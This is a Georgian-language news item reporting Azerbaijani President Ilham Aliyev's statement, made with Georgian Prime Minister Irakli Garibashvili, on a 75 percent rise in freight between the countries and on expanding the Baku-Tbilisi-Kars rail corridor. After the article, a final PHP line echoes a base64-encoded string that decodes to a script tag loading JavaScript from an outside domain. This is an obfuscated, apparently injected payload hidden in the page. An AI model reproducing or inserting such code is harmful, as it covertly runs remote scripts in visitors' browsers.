celsiusi
ავერსი შნაიდერი
აზერბაიჯანის რესპუბლიკის პრეზიდენტ ილჰამ ალიევის განცხადებით, საქართველოსა და აზერბაიჯანს შორის ტვირთბრუნვა 75 პროცენტით გაიზარდა.
 
„უნდა ვთქვა, რომ რკინიგზის ტრანსპორტი – ბაქო-თბილისი-ყარსი შეიძლება გამოყენებულ იქნას იმისათვის, რომ ხუთი მილიონი ტონით დაიტვირთოს. მომდევნო წელს უფრო მეტ კაპიტალდაბანდებას მოვახდენთ ამ მიმართულებით ამ დერეფანში და უფრო მეტი ფინანსური რესურსი გამოიყოფა. ჩვენ ვაპირებთ ამ მარშრუტის გამოყენებას იმისათვის, რომ კასპიის საშუალებით, აზერბაიჯანისა და საქართველოს გავლით, ევროპისკენ გავიტანოთ ტვირთები და ასევე, დავამუშაოთ ახალი მარშრუტები“, – აღნიშნა ილჰამ ალიევმა.
 
როგორც ალიევმა საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილთან ერთობლივი განცხადების დროს აღნიშნა, ყველა ქვეყნის ინტერესშია, გაიზარდოს ბაქო-თბილისი ყარსის მიმართულება, მოხდეს საქართველოს პორტების გამოყენება ცენტრალური აზიიდან ევროპისკენ ტვირთბრუნვისთვის და პირიქით.
 
„იცით, რომ ყველა ქვეყნის ინტერესშია, გაიზარდოს ბაქო-თბილისი-ყარსის მიმართულება, მოხდეს საქართველოს პორტების გამოყენება იმისათვის, რომ ტვირთბრუნვა ცენტრალური აზიიდან ევროპისკენ წავიდეს და პირიქით. მიგვაჩნია, რომ ამ პოტენციალის გაზრდის შესაძლებლობა გვაქვს. ახალი რეალობა იქმნება და ამისთვის მზად უნდა ვიყოთ. უნდა ვთქვა, რომ ბაქოს საერთაშორისო სავაჭრო-საზღვაო პორტი და მისი პოტენციალი გაიზრდება და უფრო მეტი ინვესტიცია ჩაიდება. ამ კუთხით, სატრანსპორტო მიმართულებით მჭიდროდ უნდა ვითანამშრომლოთ საქართველოსთან, რადგან ეს უნდა იყოს შეხმატკბილებული, ერთობლივი ძალისხმევა. სატრანსპორტო შესაძლებლობის განვითარებისთვის მეზობლებთან უნდა განვავითაროთ ურთიერთობა, რადგან სხვა შემთხვევაში ვერ ვიქნებით სანდო სატრანზიტო ქვეყანა. საქართველოს სახით ჩვენ გვყავს მეგობარი მეზობელი და პარტნიორი ქვეყანა. საერთო ჯამში, იმ ფაქტორის გათვალისწინებით, რომ მზარდია მოთხოვნა ენერგომატარებლებზე, საქართველო და აზერბაიჯანი წარმოდგენილი არიან ერთ ფრონტზე და ერთად ვიმუშავებთ, რათა ჩვენი ეროვნული ინტერესები, ჩვენი მოძმე ერის ინტერესები ისეთ ურთიერთობებზე იყოს აწყობილი, ქმნიდეს ისეთ მნიშვნელოვან ურთიერთობებს, რომ მსოფლიოსაც მოუტანოს სარგებელი. ჩვენი მეგობრობა არის ამის საფუძველი, ჩვენი ერების, ჩვენი ქვეყნების და ჩვენი ქვეყნების ლიდერების ხელშეწყობით. მე ვხედავ ამ შესაძლებლობას და მადლობას ვუხდი საქართველოს პრემიერ-მინისტრს ამ მშვენიერ ადგილას ჩემი მოწვევისთვის. მინდა, მეგობარ და მოძმე ერს ვუსურვო სამუდამო კეთილდღეობა“, – განაცხადა ილჰამ ალიევმა.
464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");